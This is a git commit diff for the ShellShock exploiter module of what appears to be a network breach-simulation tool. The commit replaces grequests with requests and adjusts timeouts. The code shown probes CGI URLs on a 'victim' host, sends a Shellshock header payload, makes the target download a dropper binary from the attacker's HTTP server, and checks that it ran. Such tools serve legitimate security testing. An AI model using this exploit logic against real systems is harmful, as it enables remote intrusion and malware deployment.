Removed reliance on grequests. Complicates other code and no real performance improvement in a LAN enviornment.
This commit is contained in:
parent
9ab5b178df
commit
ab7f731ed5
|
@ -8,7 +8,7 @@ from exploit import HostExploiter
|
||||||
from model.host import VictimHost
|
from model.host import VictimHost
|
||||||
from shellshock_resources import CGI_FILES
|
from shellshock_resources import CGI_FILES
|
||||||
from model import MONKEY_ARG
|
from model import MONKEY_ARG
|
||||||
from exploit.tools import get_target_monkey, HTTPTools, report_failed_login
|
from exploit.tools import get_target_monkey, HTTPTools
|
||||||
import requests
|
import requests
|
||||||
|
|
||||||
__author__ = 'danielg'
|
__author__ = 'danielg'
|
||||||
|
@ -16,7 +16,7 @@ __author__ = 'danielg'
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
TIMEOUT = 2
|
TIMEOUT = 2
|
||||||
TEST_COMMAND = '/bin/uname -a'
|
TEST_COMMAND = '/bin/uname -a'
|
||||||
DOWNLOAD_TIMEOUT = 60 # copied from rdpgrinder
|
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
||||||
|
|
||||||
|
|
||||||
class ShellShockExploiter(HostExploiter):
|
class ShellShockExploiter(HostExploiter):
|
||||||
|
@ -37,7 +37,8 @@ class ShellShockExploiter(HostExploiter):
|
||||||
def exploit_host(self, host, depth=-1, src_path=None):
|
def exploit_host(self, host, depth=-1, src_path=None):
|
||||||
assert isinstance(host, VictimHost)
|
assert isinstance(host, VictimHost)
|
||||||
# start by picking ports
|
# start by picking ports
|
||||||
candidate_services = {service: host.services[service] for service in host.services if host.services[service]['name'] == 'http'}
|
candidate_services = {service: host.services[service] for service in host.services if
|
||||||
|
host.services[service]['name'] == 'http'}
|
||||||
|
|
||||||
valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in self.HTTP if
|
valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in self.HTTP if
|
||||||
'tcp-' + str(port) in candidate_services]
|
'tcp-' + str(port) in candidate_services]
|
||||||
|
@ -113,13 +114,14 @@ class ShellShockExploiter(HostExploiter):
|
||||||
http_path, dropper_target_path_linux)
|
http_path, dropper_target_path_linux)
|
||||||
|
|
||||||
download = exploit + download_command
|
download = exploit + download_command
|
||||||
self.attack_page(url, header, download)
|
self.attack_page(url, header,
|
||||||
|
download) # we ignore failures here since it might take more than TIMEOUT time
|
||||||
|
|
||||||
http_thread.join(DOWNLOAD_TIMEOUT)
|
http_thread.join(DOWNLOAD_TIMEOUT)
|
||||||
http_thread.stop()
|
http_thread.stop()
|
||||||
|
|
||||||
if (http_thread.downloads != 1) or (
|
if (http_thread.downloads != 1) or (
|
||||||
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
||||||
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
|
@ -138,7 +140,7 @@ class ShellShockExploiter(HostExploiter):
|
||||||
self._config.dropper_target_path_linux, host, cmdline)
|
self._config.dropper_target_path_linux, host, cmdline)
|
||||||
|
|
||||||
if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)):
|
if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)):
|
||||||
LOG.info("Failed running the monkey, log file does not exist")
|
LOG.info("Log file does not exist, monkey might not have run")
|
||||||
continue
|
continue
|
||||||
|
|
||||||
return True
|
return True
|
||||||
|
@ -192,20 +194,16 @@ class ShellShockExploiter(HostExploiter):
|
||||||
Checks if which urls exist
|
Checks if which urls exist
|
||||||
:return: Sequence of URLs to try and attack
|
:return: Sequence of URLs to try and attack
|
||||||
"""
|
"""
|
||||||
import grequests # at this point, it monkey patches half the world and we must stop it
|
import requests
|
||||||
attack_path = 'http://'
|
attack_path = 'http://'
|
||||||
if is_https:
|
if is_https:
|
||||||
attack_path = 'https://'
|
attack_path = 'https://'
|
||||||
attack_path = attack_path + str(host) + ":" + str(port)
|
attack_path = attack_path + str(host) + ":" + str(port)
|
||||||
attack_urls = [attack_path + url for url in url_list]
|
attack_urls = [attack_path + url for url in url_list]
|
||||||
reqs = (grequests.head(u, verify=False, timeout=TIMEOUT) for u in attack_urls)
|
reqs = [requests.head(u, verify=False, timeout=TIMEOUT) for u in attack_urls]
|
||||||
resps = grequests.map(reqs, size=15)
|
valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
|
||||||
valid_resps = [resp for resp in resps if resp and resp.status_code == requests.codes.ok]
|
|
||||||
urls = [resp.url for resp in valid_resps]
|
urls = [resp.url for resp in valid_resps]
|
||||||
|
|
||||||
# revert monkey patch
|
|
||||||
import socket # this is the monkeypatched socket module
|
|
||||||
reload(socket)
|
|
||||||
return urls
|
return urls
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
|
|
|
@ -12,4 +12,4 @@ psutil
|
||||||
PyInstaller
|
PyInstaller
|
||||||
ecdsa
|
ecdsa
|
||||||
netifaces
|
netifaces
|
||||||
grequests
|
requests
|
||||||
|
|
Loading…
Reference in New Issue